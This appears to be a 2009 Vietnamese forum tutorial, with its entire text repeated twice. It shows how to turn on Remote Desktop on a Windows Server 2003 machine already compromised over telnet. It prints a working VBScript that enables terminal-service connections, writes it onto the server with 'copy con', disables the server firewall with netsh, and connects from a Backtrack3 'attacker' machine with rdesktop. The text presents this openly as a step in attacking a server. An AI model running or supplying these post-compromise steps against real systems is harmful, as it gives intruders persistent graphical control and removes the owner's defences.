quangthien.vn
21-12-2009, 01:21
BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA
Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.
Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3
B1. Trên Server kiểm tra remote desktop chưa bật.
http://blufiles.storage.msn.com/y1p4y6V_uwP4xHR3UxBXf3mPYfyoD2FFuKnfX6Q5ESI8A0J9qL eizPmjN1-Zw9CS43L?PARTNER=WRITER
B2. Trên máy Attacker, telnet vào Server
http://blufiles.storage.msn.com/y1ptXS9XiYq7tZblJLRCBddBZDPifE7au2Dz9wDiPAlTjlE0_y eVHwX_4C94HZCx-7GVsNlptCuRzSFYaeyvctX-g?PARTNER=WRITER
B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop
http://blufiles.storage.msn.com/y1pvPnjHFmsbVMfEs7EIi_Wypz-HqaYMghPJbjH7aw87nK1reIuLb-D7n_EfAebQUyUKVHpO32LBQUyp2_snTw1DQ?PARTNER=WRITER
Nội dung file VBScript remote.vbs
machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ' 0=off, 1=on
set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )
for each item in items
item.SetAllowTSConnections( value_to_set )
nextB4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.
http://blufiles.storage.msn.com/y1pujX1XHnyhHmsuh7t8S-6bkjlBvBEK0H6bvIe_FHujOE-JUFz0S7_3-NnUtDnMRdbg5BG1zjw9kF-rD3cJKpmNw?PARTNER=WRITER
B5. Dùng lệnh dir kiểm tra
http://blufiles.storage.msn.com/y1psAhcdgmLaSrz-7b36_U5Vyj_81aC0QmAwVMzke4_MdDdqu8Bzdrilv9ELZpQoyp D0tG05KRDzBm5oeDns5vwWQ?PARTNER=WRITER
B6. Chạy file remote.vbs để bật remote desktop.
http://blufiles.storage.msn.com/y1pg2P3mfVsaE5q6jyfoyivNW0Rf2Yyu_sZ5vZLf_QbMXgmCZz grIUcX6JEBnQjf_vlK0TXRPPfSod5VHKwIf-XTw?PARTNER=WRITER
B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)
http://blufiles.storage.msn.com/y1pnKteeyYaWmjLpkTTHQsE3vQMaVWa320ZsvHv_S9LfsORDzn 9LZnf2WjTQrTLzdigHkPRuSgykD4MARaTIV7QoA?PARTNER=WR ITER
B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật
http://blufiles.storage.msn.com/y1ptoUKdvjRF6jeg3Z08h2C-FzqTwFewVRsGYHeK5VJ7hYhHS3nzwtjgoPLqWHAqB3gmhlTLYo imSqQveosylLozg?PARTNER=WRITER
B9. Tắt firewall của Server
Sử dụng lệnh : Netsh firewall set opmode disable
http://blufiles.storage.msn.com/y1pd3_x-ZVit6xFT6fjcZt_BXwymLczd5se3-A-Vh2YzYf9CJv471xfNsrOsNQ2TIG7?PARTNER=WRITER
B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.
Sử dụng lệnh rdesktop [hostname]
http://blufiles.storage.msn.com/y1pYQ165ybKpCyan9c-YLicRMRQw-PKwGgqjKtAqNIJMzAPw9q9MRtXgzzNYray5Cdn8X4DV1KdwtlT VktUBzwH1w?PARTNER=WRITER
B11. Nhập username/password của Administrator
http://blufiles.storage.msn.com/y1p0kjs1u-3NHPk0Hs_9dNjHYMwJ7x91vvxufk6K-ZoQGynVJkSXDV6L3UrmRmPEZMcMGnQ5Vr2WG3N-QR5xHt1Eg?PARTNER=WRITER
B12. Truy cập thành công với quyền Administrators
http://blufiles.storage.msn.com/y1pUvXzUkOMMNnXqSC15J-UGeGVJRtgQWvZJfrJ_RalhHAVaG7oOgvPq3Er4NGOPBLWHvd0g MRg52k0FSrmavdzbg?PARTNER=WRITER
Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.
Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3
B1. Trên Server kiểm tra remote desktop chưa bật.
http://blufiles.storage.msn.com/y1p4y6V_uwP4xHR3UxBXf3mPYfyoD2FFuKnfX6Q5ESI8A0J9qL eizPmjN1-Zw9CS43L?PARTNER=WRITER
B2. Trên máy Attacker, telnet vào Server
http://blufiles.storage.msn.com/y1ptXS9XiYq7tZblJLRCBddBZDPifE7au2Dz9wDiPAlTjlE0_y eVHwX_4C94HZCx-7GVsNlptCuRzSFYaeyvctX-g?PARTNER=WRITER
B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop
http://blufiles.storage.msn.com/y1pvPnjHFmsbVMfEs7EIi_Wypz-HqaYMghPJbjH7aw87nK1reIuLb-D7n_EfAebQUyUKVHpO32LBQUyp2_snTw1DQ?PARTNER=WRITER
Nội dung file VBScript remote.vbs
machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ' 0=off, 1=on
set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )
for each item in items
item.SetAllowTSConnections( value_to_set )
nextB4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.
http://blufiles.storage.msn.com/y1pujX1XHnyhHmsuh7t8S-6bkjlBvBEK0H6bvIe_FHujOE-JUFz0S7_3-NnUtDnMRdbg5BG1zjw9kF-rD3cJKpmNw?PARTNER=WRITER
B5. Dùng lệnh dir kiểm tra
http://blufiles.storage.msn.com/y1psAhcdgmLaSrz-7b36_U5Vyj_81aC0QmAwVMzke4_MdDdqu8Bzdrilv9ELZpQoyp D0tG05KRDzBm5oeDns5vwWQ?PARTNER=WRITER
B6. Chạy file remote.vbs để bật remote desktop.
http://blufiles.storage.msn.com/y1pg2P3mfVsaE5q6jyfoyivNW0Rf2Yyu_sZ5vZLf_QbMXgmCZz grIUcX6JEBnQjf_vlK0TXRPPfSod5VHKwIf-XTw?PARTNER=WRITER
B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)
http://blufiles.storage.msn.com/y1pnKteeyYaWmjLpkTTHQsE3vQMaVWa320ZsvHv_S9LfsORDzn 9LZnf2WjTQrTLzdigHkPRuSgykD4MARaTIV7QoA?PARTNER=WR ITER
B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật
http://blufiles.storage.msn.com/y1ptoUKdvjRF6jeg3Z08h2C-FzqTwFewVRsGYHeK5VJ7hYhHS3nzwtjgoPLqWHAqB3gmhlTLYo imSqQveosylLozg?PARTNER=WRITER
B9. Tắt firewall của Server
Sử dụng lệnh : Netsh firewall set opmode disable
http://blufiles.storage.msn.com/y1pd3_x-ZVit6xFT6fjcZt_BXwymLczd5se3-A-Vh2YzYf9CJv471xfNsrOsNQ2TIG7?PARTNER=WRITER
B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.
Sử dụng lệnh rdesktop [hostname]
http://blufiles.storage.msn.com/y1pYQ165ybKpCyan9c-YLicRMRQw-PKwGgqjKtAqNIJMzAPw9q9MRtXgzzNYray5Cdn8X4DV1KdwtlT VktUBzwH1w?PARTNER=WRITER
B11. Nhập username/password của Administrator
http://blufiles.storage.msn.com/y1p0kjs1u-3NHPk0Hs_9dNjHYMwJ7x91vvxufk6K-ZoQGynVJkSXDV6L3UrmRmPEZMcMGnQ5Vr2WG3N-QR5xHt1Eg?PARTNER=WRITER
B12. Truy cập thành công với quyền Administrators
http://blufiles.storage.msn.com/y1pUvXzUkOMMNnXqSC15J-UGeGVJRtgQWvZJfrJ_RalhHAVaG7oOgvPq3Er4NGOPBLWHvd0g MRg52k0FSrmavdzbg?PARTNER=WRITER